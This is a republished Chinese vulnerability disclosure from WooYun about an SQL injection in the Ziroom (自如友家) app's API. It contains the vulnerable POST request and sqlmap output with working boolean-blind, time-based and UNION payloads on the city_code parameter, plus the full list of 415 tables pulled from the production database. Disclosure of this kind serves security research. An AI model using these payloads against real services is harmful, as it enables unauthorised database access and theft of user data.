神刀安全网

漏洞标题: 自如友家APP的SQL注射漏洞涉及415个表198万多数据

漏洞详情

披露状态:

2016-04-22: 细节已通知厂商并且等待厂商处理中
2016-04-22: 厂商已经确认,细节仅向厂商公开
2016-05-02: 细节向核心白帽子及相关领域专家公开
2016-05-12: 细节向普通白帽子公开
2016-05-22: 细节向实习白帽子公开
2016-06-06: 细节向公众公开

简要描述:

自如友家APP sql注射漏洞涉及415个表198万多数据

详细说明:

链接及参数:

POST /index.php?_p=api_mobile&_a=get_hotSearchWords HTTP/1.1

Content-Length: 190

Content-Type: application/x-www-form-urlencoded

Host: interfaces.ziroom.com

Connection: close

User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&ip=192.168.100.33&uid=bffa0b4c-ba27-4014-88d7-22edb9cf357b&timestamp=1461314033&city_code=110000&app=v3.3.1&os=android%3A5.1&model=8681-A01

漏洞证明:

[*] starting at 16:55:01

[16:55:01] [INFO] parsing HTTP request from 'yy.txt'

[16:55:02] [INFO] resuming back-end DBMS 'mysql'

[16:55:02] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:

Parameter: city_code (POST)

Type: boolean-based blind

Title: AND boolean-based blind – WHERE or HAVING clause

Payload: network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&ip=192.168.147.33&uid=bffa0b4c-ba27-4014-88d7-22edb9cf357b&timestamp=1461314033&city_code=110000 AND 1153=1153&app=v3.3.1&os=android:5.1&model=8681-A01

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&ip=192.168.147.33&uid=bffa0b4c-ba27-4014-88d7-22edb9cf357b&timestamp=1461314033&city_code=110000 AND (SELECT * FROM (SELECT(SLEEP(5)))yfFI)&app=v3.3.1&os=android:5.1&model=8681-A01

Type: UNION query

Title: Generic UNION query (NULL) – 1 column

Payload: network=WIFI&sign=28d489fc766c0f3ab1ecb8daca16c14a&ip=192.168.147.33&uid=bffa0b4c-ba27-4014-88d7-22edb9cf357b&timestamp=1461314033&city_code=110000 UNION ALL SELECT CONCAT(0x7170707071,0x57724b52437841506852734e69546e4a4b567079686d587a6b625754486470416377694a7a655373,0x71766b7171)– sKhk&app=v3.3.1&os=android:5.1&model=8681-A01

[16:55:02] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.4.22

back-end DBMS: MySQL 5.0.12

[16:55:02] [INFO] fetching tables for database: 'newziroom'

[16:55:02] [INFO] the SQL query used returns 415 entries

Database: newziroom

[415 tables]

+————————————–+

| user |

| active_sz_yushouka |

| activity_wx_plus_2 |

| api_house_shelf_apply |

| api_house_shelf_following |

| api_house_shelf_reason |

| cash |

| cash_tmp |

| cms_activity_manage |

| cms_huilei_apply |

| cms_huilei_house |

| cms_serverinfo_manage |

| collection |

| complain |

| complain_content |

| log_crm_request |

| m_look_push |

| m_msg_guanjia |

| m_msg_jpush |

| m_msg_ziroomer |

| m_newsign_order_jdloan_refund_log |

| m_newsign_orders_log |

| m_payment_callback_log |

| m_user_count_log |

| m_will_about_user_detail |

| m_zwp_appointment_look |

| member_list |

| operation_log |

| pay_cron_list |

| pay_order |

| pay_order_success |

| pay_terraceorder_success |

| payment_order |

| payment_order_callback_log |

| shhsh_recommended_user_info |

| shhsh_ziroomer_info |

| steward |

| sz_seed_plan |

| sz_seed_plan_pic |

| sz_seed_plan_question |

| szhsh_recommended_user_info |

| szhsh_ziroomer_info |

| t_400_day_detail |

| t_account_log |

| t_active_base |

| t_admin_auth |

| t_ams_book_api |

| t_appointment |

| t_area |

| t_arrange |

| t_award |

| t_award_getting |

| t_award_hd |

| t_award_list |

| t_award_movie |

| t_awardlist |

| t_awardlist_bak |

| t_baojie_decode_action |

| t_baojie_pay_centre_action |

| t_baojie_pay_click_action |

| t_base |

| t_bills |

| t_blacklist |

| t_blind_base |

| t_blind_vote |

| t_bookonline_customer |

| t_business |

| t_business_bak |

| t_cards_log |

| t_chest_points |

| t_chest_vote |

| t_city |

| t_citys |

| t_cms_account_log |

| t_cms_activityApp |

| t_cms_activityApp_body |

| t_cms_activityApp_detail |

| t_cms_ad |

| t_cms_ad_index |

| t_cms_ad_index_pic |

| t_cms_ad_keywords |

| t_cms_ad_new |

| t_cms_ad_new_pic |

| t_cms_ad_room |

| t_cms_ad_room_category |

| t_cms_ad_room_phone |

| t_cms_administrator |

| t_cms_app_version |

| t_cms_cdotp_activity |

| t_cms_change_log |

| t_cms_customer_message |

| t_cms_faq |

| t_cms_faq_list |

| t_cms_friend_message |

| t_cms_gift_init |

| t_cms_html |

| t_cms_links |

| t_cms_links_modules |

| t_cms_links_type |

| t_cms_m_keywords |

| t_cms_m_room |

| t_cms_m_room_category |

| t_cms_message_log |

| t_cms_newsblogs_list |

| t_cms_newsblogs_list_01 |

| t_cms_newsblogs_type |

| t_cms_newsblogs_type_01 |

| t_cms_newyear |

| t_cms_part |

| t_cms_part_search |

| t_cms_part_search_copy |

| t_cms_project |

| t_cms_qa |

| t_cms_qa_type |

| t_cms_sales_manage |

| t_cms_same_city |

| t_cms_service_answer |

| t_cms_service_guide |

| t_cms_service_question |

| t_cms_service_star |

| t_cms_subwayadvers |

| t_cms_svr_tool |

| t_cms_sys_message |

| t_cms_tax |

| t_cms_up_project |

| t_cms_user |

| t_cms_user1 |

| t_cms_user20150816 |

| t_cms_user20160125 |

| t_cms_user_0125XU |

| t_cms_user_20160125bak |

| t_cms_user_copy |

| t_cms_user_old |

| t_cms_user_zx0126 |

| t_cms_vanke_activity |

| t_cms_warmprompt |

| t_cms_xiaoqu_feature |

| t_cms_xiaoqu_feature_photo |

| t_cms_year_order |

| t_cms_ziroom_announcement |

| t_cms_ziroomer_category |

| t_cms_ziroomer_cheer |

| t_cms_ziroomer_commendatory_letter |

| t_cms_ziroomer_index |

| t_cms_ziroomer_shop |

| t_cms_ziroommanager |

| t_cms_ziruyu_story |

| t_common_account |

| t_common_actual_account |

| t_community_around |

| t_complain |

| t_contract |

| t_contract_book |

| t_contract_book_payVoucher |

| t_contract_cards |

| t_contract_chest |

| t_contract_direct |

| t_contract_direct_active_log |

| t_contract_direct_activities |

| t_contract_direct_activities_bak |

| t_contract_direct_activities_log |

| t_contract_direct_api_log |

| t_contract_direct_api_log_old |

| t_contract_direct_cust |

| t_contract_direct_payVoucher |

| t_contract_direct_promotion |

| t_contract_direct_property1 |

| t_contract_direct_property2 |

| t_contract_direct_property3 |

| t_contract_direct_receipt |

| t_contract_direct_renter |

| t_contract_direct_renter_log |

| t_contract_direct_step_log |

| t_contract_direct_substep |

| t_contract_direct_upcust_log |

| t_contract_insert |

| t_contract_insert_api_log |

| t_contract_insert_receipt |

| t_contract_jingdong |

| t_contract_log |

| t_contract_online |

| t_contract_receipt_retry_list |

| t_contract_renew |

| t_contract_reservation |

| t_contract_reservation_active_log |

| t_contract_reservation_comment |

| t_contract_reservation_customer |

| t_contract_reservation_customer_log |

| t_contract_reservation_customer_mlog |

| t_contract_reservation_house |

| t_contract_reservation_pay_list |

| t_contract_reservation_pay_log |

| t_contract_reservation_refund |

| t_contract_ziruyu_contract_complete |

| t_contract_ziruyu_error |

| t_contract_ziruyu_pay_callback |

| t_contract_ziruyu_pay_complete |

| t_contract_ziruyu_pay_url_log |

| t_contract_ziruyu_sync_log |

| t_coupon_card |

| t_coupon_card_160203 |

| t_coupon_card_bak |

| t_crm_book_look |

| t_crm_book_look_msg |

| t_crm_contract_house_belonger |

| t_crm_customer |

| t_crm_customer_msg |

| t_crm_data_report |

| t_crm_direct |

| t_crm_following |

| t_crm_lease |

| t_crm_lease_con |

| t_crm_lease_operate |

| t_crm_lookhouse |

| t_crm_lookhouse_msg |

| t_crm_lookhouse_wi |

| t_crm_notify |

| t_crm_relation |

| t_crm_relation_item |

| t_crm_relation_new |

| t_crm_reservation |

| t_crm_work_all |

| t_crm_work_log |

| t_customer |

| t_customer_rating |

| t_cycle |

| t_cycle_face |

| t_dakehu_comment |

| t_dakehu_groupCustomers |

| t_dakehu_new |

| t_dakehu_notice |

| t_dakehu_teamwork |

| t_dakehu_teamwork_content |

| t_dict |

| t_dict_school |

| t_district |

| t_district_bak |

| t_district_business |

| t_district_business_bak |

| t_dspeak |

| t_duanzu_apply |

| t_duanzu_rss |

| t_ehr_dept |

| t_ehr_dept_log |

| t_ehr_job |

| t_ehr_job_log |

| t_ehr_person |

| t_ehr_person_log |

| t_exist_pic_house |

| t_feedback |

| t_function |

| t_general_consumption_api_log |

| t_general_consumption_customer |

| t_general_consumption_detail |

| t_general_consumption_operation_log |

| t_general_consumption_status |

| t_general_consumption_temp |

| t_general_consumption_type |

| t_general_receipt_detail |

| t_general_receipt_stand_num |

| t_gift |

| t_gift_bak |

| t_gift_bat |

| t_gift_by_user |

| t_gift_by_user_s |

| t_gift_cms_admin |

| t_gift_gj |

| t_gift_gj_s |

| t_guest |

| t_haiyan_tour |

| t_house |

| t_house_room_lock |

| t_index_ziroomer |

| t_index_ziroomer_wb |

| t_integral_add_log |

| t_intention_house_info |

| t_ios_channel |

| t_ios_msg |

| t_keyword |

| t_log |

| t_login_log |

| t_loginlog |

| t_map_building |

| t_map_content |

| t_map_suggestion |

| t_map_type |

| t_memecache_queue_log |

| t_menu |

| t_move_house |

| t_order_log |

| t_order_pay_log |

| t_pay |

| t_pay_account |

| t_pay_account_relet |

| t_pay_actual_account |

| t_pay_actual_account_relet |

| t_pay_plan |

| t_pay_plan_direct |

| t_pay_plan_online |

| t_pay_plan_renew |

| t_payment_log |

| t_payment_receipt |

| t_penalty_change_log |

| t_penalty_plan |

| t_permission |

| t_permission_group |

| t_profile |

| t_project_images |

| t_province |

| t_quality_rating |

| t_question |

| t_questionnaire |

| t_rebate |

| t_recruit |

| t_recruit_detail |

| t_referee |

| t_referee_card |

| t_referee_card_send_record |

| t_referee_question_answer |

| t_relation_recruit |

| t_renew_apply |

| t_renew_expire |

| t_repair |

| t_role |

| t_room |

| t_room_pictures_new |

| t_room_promotion |

| t_room_promotion_type |

| t_seekziroomer_base |

| t_seekziroomer_vote |

| t_sellcontrol_log |

| t_service_common_question_keyword |

| t_soap_bind_phone |

| t_soap_bind_phone20160125 |

| t_soap_bind_phone20160125bak |

| t_soap_bind_phone_0125XU |

| t_soap_bind_phone_160315 |

| t_soap_bind_phone_160412 |

| t_soap_bind_phone_bak20150814 |

| t_soap_bind_phone_zx0126 |

| t_sowing |

| t_special |

| t_steward_business |

| t_steward_business_20150505 |

| t_sub_station |

| t_subway |

| t_subway_station |

| t_subway_station_bak |

| t_suding_house |

| t_suding_order |

| t_suding_pay_log |

| t_suding_refund_log |

| t_suding_reservation |

| t_suding_term |

| t_suding_yuyue |

| t_summer |

| t_temp_contract_activity |

| t_temp_jd_activity_lottery |

| t_temp_jd_activity_winner_list |

| t_ticket |

| t_trends |

| t_update_login |

| t_user |

| t_user_appointment |

| t_user_date |

| t_web_navigation |

| t_www_ziruyu_yuyue |

| t_zhuanti_color_life |

| t_ziroomlife_activity |

| t_ziroomlife_bulletin |

| t_ziroomlife_businessinfo |

| t_ziroomlife_neighborreminder |

| t_ziroomlife_news |

| t_ziroomlife_vote |

| t_ziruyu_activity |

| t_ziruyu_winner |

| t_ziruyu_yuyue |

| t_zrsd_log |

| temp_table1 |

| test |

| tmp |

| tmp_newziroom_xiazhi |

| tmp_xiazhi |

| u_general_receipt_callback_log |

| u_general_receipt_order |

| u_general_receipt_order_callback |

| u_general_receipt_to_crm_error |

| u_general_receipt_to_crm_log |

| unfirst_pay_internal_consu |

| unfirst_pay_notify_log |

| unfirst_pay_order |

| unfirst_pay_post_log |

| unfirst_pay_return_log |

| v_room |

| v_roomandcustomer |

| wx_activity |

| wx_credit_record |

| wx_credit_total |

| wx_move_code |

| wx_user |

| ziroom_flat |

| ziroom_simple_life |

| zrlife |

| zsl_activity_info |

| zsl_pic_address |

| zsl_vote_info |

| zsl_ziroomer_info |

| zwp_archives_evaluation |

| zwp_archives_surrounding |

| zwp_groups |

| zwp_nums |

| zwp_permission |

| zwp_permission_relation |

| zwp_user_group_relation |

| zwp_user_group_relation_copy |

+————————————–+

[16:55:02] [INFO] fetched data logged to text files under

漏洞标题:  自如友家APP的SQL注射漏洞涉及415个表198万多数据

漏洞标题:  自如友家APP的SQL注射漏洞涉及415个表198万多数据

修复方案:

参数过滤!

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 自如友家APP的SQL注射漏洞涉及415个表198万多数据

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址